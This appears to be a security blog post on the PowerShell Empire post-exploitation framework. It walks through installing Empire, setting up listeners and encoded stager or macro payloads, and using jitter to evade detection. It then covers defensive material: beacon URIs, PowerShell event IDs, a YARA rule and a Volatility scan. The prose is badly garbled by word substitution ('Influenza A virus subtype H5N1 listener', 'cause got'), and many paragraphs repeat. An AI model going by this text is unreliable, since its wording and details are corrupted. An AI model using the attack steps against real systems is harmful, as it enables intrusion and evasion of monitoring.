In my last blog entry I explored some post-exploitation possibilities using PowerShell in addition to Matt Graeber's repository of penetration testing tools, PowerSploit. PowerSploit, like PowerTools, is a gear upwards of fantastic scripts capable of accomplishing siloed tasks; however, they lack the modularity in addition to plug-ability of a consummate framework. Today I desire to utter almost a relatively novel entrant to the field—PowerShell Empire.
Although Empire is exclusively a span of months old, the developers (who also worked on Veil) cause got built an impressive lightweight administration architecture that borrows heavily from projects similar PowerSploit in addition to PowerTools to create a "pure PowerShell post-exploitation agent built on cryptographically-secure communications in addition to a flexible architecture." While working alongside it the past times span of days I cause got found that it has a familiar workflow for those who are accustomed to Metasploit, making it slow to job for penetration testing Windows environments.
I cause got used Metasploit for many years, dabbled alongside Core Impact, in addition to explored Armitage/Cobalt Strike at slap-up length. These are all fantastic frameworks that are incredibly extensible, cause got potent community back upwards in addition to regular evolution unloose cycles. But the PowerSploit framework isn't precisely 'built-in' to those solutions (Cobalt Strike allows you lot to import modules making it perhaps the easiest to extend inwards damage of PowerShell based attacks). I've had a few conversations lately alongside people who are unsure almost what framework they should live using in addition to my respond is e'er the same, it depends. What you lot conduct is largely subject on fiscal limitations in addition to objectives but inwards the goal it is likely best that you lot acquire familiar alongside all of these offerings.
There are a span of cardinal features inwards Empire:
We tin meet the beacon issues 3 GET requests inside a curt menstruum of fourth dimension during a telephone telephone habitation interval. The requests are sent to /news.asp, /admin/get.php, /login/process.jsp in addition to cause got a generic Mozilla User-Agent. 
Although Empire is exclusively a span of months old, the developers (who also worked on Veil) cause got built an impressive lightweight administration architecture that borrows heavily from projects similar PowerSploit in addition to PowerTools to create a "pure PowerShell post-exploitation agent built on cryptographically-secure communications in addition to a flexible architecture." While working alongside it the past times span of days I cause got found that it has a familiar workflow for those who are accustomed to Metasploit, making it slow to job for penetration testing Windows environments.
I cause got used Metasploit for many years, dabbled alongside Core Impact, in addition to explored Armitage/Cobalt Strike at slap-up length. These are all fantastic frameworks that are incredibly extensible, cause got potent community back upwards in addition to regular evolution unloose cycles. But the PowerSploit framework isn't precisely 'built-in' to those solutions (Cobalt Strike allows you lot to import modules making it perhaps the easiest to extend inwards damage of PowerShell based attacks). I've had a few conversations lately alongside people who are unsure almost what framework they should live using in addition to my respond is e'er the same, it depends. What you lot conduct is largely subject on fiscal limitations in addition to objectives but inwards the goal it is likely best that you lot acquire familiar alongside all of these offerings.
There are a span of cardinal features inwards Empire:
- Invoke Expression in addition to Web Client download cradles allow you lot to remain off disk every bit much every bit possible. Evading on-access scanners is crucial in addition to leaving every bit few forensic artifacts every bit possible is just practiced trade-craft.
- The agent beacons inwards a cryptographically secure agency in addition to inwards a agency that effectively emulates command in addition to command traffic.
As penetration testers our goal should live to effectively mimic real-world assail methodologies, network traffic in addition to end-point activity to render clients alongside a gear upwards of indicators of compromise that tin live effectively used to position monitoring gaps. Tools similar Empire assistance to force these ideas forrad in addition to cut the latency betwixt assailant conception in addition to defender evolution.
In this post service I desire to demonstrate how to job Empire, send basic IR retentivity analysis (in the same format every bit my previous article) and, to a greater extent than importantly, highlight some give-and-take around automated detection at the network in addition to host level.
Red Team
I used Kali (2.0) for my server but I'm sure this would piece of work on most Debian based distributions.
git clone https://github.com/PowerShellEmpire/Empire.git
cd Empire/setup
./install.sh
Simple. To launch Empire, execute the next command from the Empire rootage directory alongside the -debug switch enabled to ensure logs are stored for troubleshooting in addition to tracing your activity:
./empire -debug
Empire uses the concept of listeners, stagers in addition to agents. Influenza A virus subtype H5N1 listener is a network socket instantiated on the server side that manages connections from infected agents. Influenza A virus subtype H5N1 stager is the payload you lot intend to deliver to the victim machine. To access your listeners only type ‘listeners’ to locomote into the listeners context, followed past times ‘info’.
There are a few of import values to greenback here. First, you lot tin specify a KillDate in addition to WorkingHours to bound agent in addition to listener activity based on projection limitations. I cause got surely worked on a number of engagements inwards which a customer had really specific restrictions almost when nosotros could work, which would cause got proved invaluable.
Second, the DefaultJitter value volition assistance evade solutions that displace to position malicious beacon patterns that occur at a constant interval, in addition to imply scripted or machine similar activity that champaign stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern that the agent uses to beacon home, which nosotros volition utter to a greater extent than almost later.
Third, define variables using 'set [variablename] [value]' syntax, in addition to activate the listener alongside the 'execute' command . Type listing to verify that the listener is active in addition to a network socket has been opened.
Second, the DefaultJitter value volition assistance evade solutions that displace to position malicious beacon patterns that occur at a constant interval, in addition to imply scripted or machine similar activity that champaign stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern that the agent uses to beacon home, which nosotros volition utter to a greater extent than almost later.
Third, define variables using 'set [variablename] [value]' syntax, in addition to activate the listener alongside the 'execute' command . Type listing to verify that the listener is active in addition to a network socket has been opened.
Logically the side past times side footstep is define a payload in addition to conduct a payload delivery mechanism. Type 'usestager' followed past times TAB+TAB to meet a listing of options.
The ii options that are best suited for payload execution are launcher in addition to macro. Launcher volition generate a PowerShell one-liner (Base64 encoded or clear text) that automatically sets the required staging key/listener values. Macro creates an business office macro alongside the appropriate callback values to found a connexion alongside the listener. This tin live embedded inwards an business office document in addition to used inwards social engineering attacks every bit a payload delivery mechanism.
To conduct a stager type 'usestager [stagername] [listenername]' followed past times 'execute'.
In the picture higher upwards you lot tin meet that the listener callback details are embedded inwards the script, in addition to a (possibly) hard-coded value of /index.asp is used for the agent GET request. The session value for the agent is included. Base64 encoding the script volition plough on the '-Enc' PowerShell flag which volition decrypt the payload at run-time making investigation in addition to tractability to a greater extent than hard (again, simulating a existent breach.)
After executing this one-liner on our victim machine you lot volition have a callback notification that a novel connexion has been established. You tin honour active agents past times typing 'agents' followed past times 'list'.
Now that a connexion is established you lot tin type 'interact [agentname]' to hop into an agent session similar to meterpreter. Enter 'usemodule' followed past times TAB+TAB to meet all available options. You tin position privilege escalation opportunities, displace laterally, found persistence, steal tokens/credentials, install key-loggers in addition to run all of the amazing post service exploitation tasks available from the PowerSploit/PowerTools exploitation kits. I don't desire to acquire into item for each of these modules every bit it is non the intent of this post. I only wanted to demonstrate how to acquire upwards in addition to running to encourage to a greater extent than offensive-security professionals to encompass this tool.
Blue Team
My objective for the defensive aspect of this post service is to send some high marking analysis of the tool itself in addition to the full general methods it employs. There are a lot of modules available in addition to of course of report each of these may locomote out behind specific indicators of attack/compromise but it's non my goal to acquire into each of them for this post.
Let's cause got a expect at some of the network traffic first.
Let's cause got a expect at some of the network traffic first.
We meet that after the initial stager is executed our outset connexion is established. On its ain this is an extremely wretched indicator. GET requests to /index.asp are going to live really mutual on whatever network. However, it does appear to live a hard-coded value in addition to it's of import to get together every bit much information every bit possible.
After this initial connexion a 2d phase payload is downloaded, cardinal negotiation occurs, an encrypted session is established in addition to the agent starts beaconing. This beacon is characterized past times the DefaultProfile variable gear upwards for the listener running on the Empire server.
We tin meet the beacon issues 3 GET requests inside a curt menstruum of fourth dimension during a telephone telephone habitation interval. The requests are sent to /news.asp, /admin/get.php, /login/process.jsp in addition to cause got a generic Mozilla User-Agent.
Again, individually each of these actions appears benign in addition to alerting on it would generate a pregnant number of simulated positives (which is the intention of the framework.) If nosotros expect at this traffic collectively nosotros could blueprint a network IDS dominion that alerts when a connexion is made to /index.ASP in addition to is followed past times at to the lowest degree iii GET requests to at to the lowest degree ii of the GET requests inwards the picture above.
Moreover, many organizations may number tight controls around the type of Browser application that tin live installed, in addition to it is unlikely to meet a Windows server alongside Firefox running. If you lot are a scheme administrator that has implemented application white-listing in addition to your users should exclusively live using IE, the presence of Mozilla/Chrome/Opera UA indicates a policy violation (best instance scenario) or a manually crafted UA (worst instance perhaps indicating malware). In whatever event, it is possible to at to the lowest degree job this information to profile other infected hosts fifty-fifty if it doesn't serve every bit a dot of initial detection. It's practiced to cause got options.
Moreover, many organizations may number tight controls around the type of Browser application that tin live installed, in addition to it is unlikely to meet a Windows server alongside Firefox running. If you lot are a scheme administrator that has implemented application white-listing in addition to your users should exclusively live using IE, the presence of Mozilla/Chrome/Opera UA indicates a policy violation (best instance scenario) or a manually crafted UA (worst instance perhaps indicating malware). In whatever event, it is possible to at to the lowest degree job this information to profile other infected hosts fifty-fifty if it doesn't serve every bit a dot of initial detection. It's practiced to cause got options.
Of course of report all of this tin live customized inwards Empire, thence from a heuristic perspective I call back the of import cause got away actually is recognizing the pattern itself in addition to non necessarily the specific implementation of that pattern. That is a footling chip esoteric thence let's essay in addition to get together to a greater extent than information from the host.
Dave lately published a two part series on Windows lawsuit monitoring. This is a fantastic starting dot for most organizations, peculiarly those who are novel to SIEM. I silent come upwards across a lot of environments that produce non cause got whatever formal log administration program, allow lonely a properly deployed SIEM alongside a practiced alerting framework that has been adequately tuned. For most companies, implementing monitoring for the lawsuit IDs Dave highlighted is a practiced objective. But for those alongside a to a greater extent than mature safety program, I call back it's of import to start looking at PowerShell events.
PowerShell 2.0 is the default installed version for Windows seven in addition to Server 2008 R2 (prior versions produce non cause got PowerShell installed) in addition to unfortunately it does non render much information from a logging perspective.
There are primarily ii log files that are accessible:
- Microsoft Windows PowerShell
- Microsoft Windows PowerShell Operational
It is also possible to enable analytic in addition to debug logging yet this is fairly noisy in addition to resources intensive. Open Event Viewer in addition to conduct View -> Show Analytic in addition to Debug Logs. Then browse Application in addition to Service Logs -> Microsoft -> Windows -> PowerShell in addition to correct click Analytic to enable it. I don't call back in that location is a lot of value add together hither but it tin live useful when debugging a script or troubleshooting a problem.
In the 2.0 version of the Microsoft Windows PowerShell Operational log you lot volition cause got the next events of interest:
- 40961 - Console is starting up
- 40962 - Console is create for user input
These logs produce incorporate meta information such every bit the user who performed the event, in addition to the estimator it was executed on but it is pretty limited. If you lot produce non job PowerShell inwards your surround (even pocket-size organizations cause got job cases thence this is unlikely) in addition to then perhaps alerting on 1 of these events may live useful but in that location is really footling contextual information stored inwards the lawsuit log to dot what was done piece the console was accessed.
The Microsoft Windows PowerShell log inwards version 2.0 of PowerShell volition oftentimes generate these lawsuit IDs:
- 600 - Provider Life-cycle
- 400 - Engine Life-cycle
- 403 - Engine Life-cycle
Again these events are fairly nondescript in addition to render footling information.
Event ID 5156 from the Windows Security audit log tin render some additional information regarding network connections if nosotros effectively filter to warning on Outbound, external, connections generated from applications similar powershell.exe.
None of these indicators are of whatever substantial quality, but thankfully Microsoft introduced some improvements inwards version 3.0 of PowerShell (no additional changes to lawsuit logging functionality inwards version 4.0 or 5.0 unfortunately).
After upgrading to PowerShell version 3.0 you lot tin specify a GPO setting to plough on module logging for Windows PowerShell modules inwards all sessions of all affected computers. Pipeline execution events for the selected modules volition in addition to then live recorded inwards the PowerShell lawsuit logs I covered earlier. You tin also interactively enable these values every bit shown below. This is shown inwards the picture below:
If nosotros at in 1 lawsuit execute our PowerShell Empire one-line stager nosotros volition cause got to a greater extent than lawsuit log information to piece of work with. Event IDs 4103 in addition to 800 are recorded in addition to incorporate a veritable wealth of information that tin live used to notice suspicious activity.
At this dot nosotros tin launch Rekall, listing processes, position suspect network connections, dump procedure retentivity in addition to perform keyword string searches.
This is a similar workflow to my prior post. In large retentivity dumps it tin live hard (time consuming) to navigate or CTRL+F search through a document for specific keywords. Mark Russinovich's strings can greatly cut this piece of work displace but a amend solution inwards my reckon is to write Yara rules in addition to job them inwards conjunction alongside Volatility. If you lot aren't familiar, Yara is a tool designed to assistance execute binary or textual pattern stand upwards for searches. It is really slow to write rules every bit the syntax is slow to pick up. Save the next to a text file alongside the .YARA extension.
dominion instance : powershell
{
meta:
Description = "Look for suspect powershell artificats."
filetype = "MemoryDump"
Author = "Greg Carson"
Date = "09-09-2015"
strings:
$s0 = "Invoke-" ascii
$s1 = "-Enc" ascii
condition:
2 of them
}
This tin in addition to then live imported to perform a search inwards Volatility:
vol.py -f image.raw --profile=Win7SP1x64 yarascan -y yarafilename.yara -p 7860
The workflow demonstrated on the Blue Team side of things isn't necessarily inwards whatever order. Ideally, you lot would cause got a SIEM dominion trigger based on a suspicious pipeline execution PowerShell lawsuit (that has appropriate filters in addition to suppression enabled), which results inwards an investigation of network traffic prior to in addition to before long after the lawsuit in addition to is followed past times a to a greater extent than thorough alive retentivity forensic analysis of the scheme in addition to others it may cause got had contact with. But this may non live possible depending on the surround you lot expose yourself in. It's of import non to rely on whatever 1 unmarried safety solution every bit the indicators of assail volition oftentimes be inwards many different places in addition to across disparate entities that solve different problems.
EDIT:
@tifkin_ contacted me to cite an additional tool from Mark Russinovich titled 'Sysmon'. It's a footling chip exterior the ambit of this post service but the tool itself shows a lot of promise, I'd recommend defenders expect into this.
EDIT:
@tifkin_ contacted me to cite an additional tool from Mark Russinovich titled 'Sysmon'. It's a footling chip exterior the ambit of this post service but the tool itself shows a lot of promise, I'd recommend defenders expect into this.
Related Links:
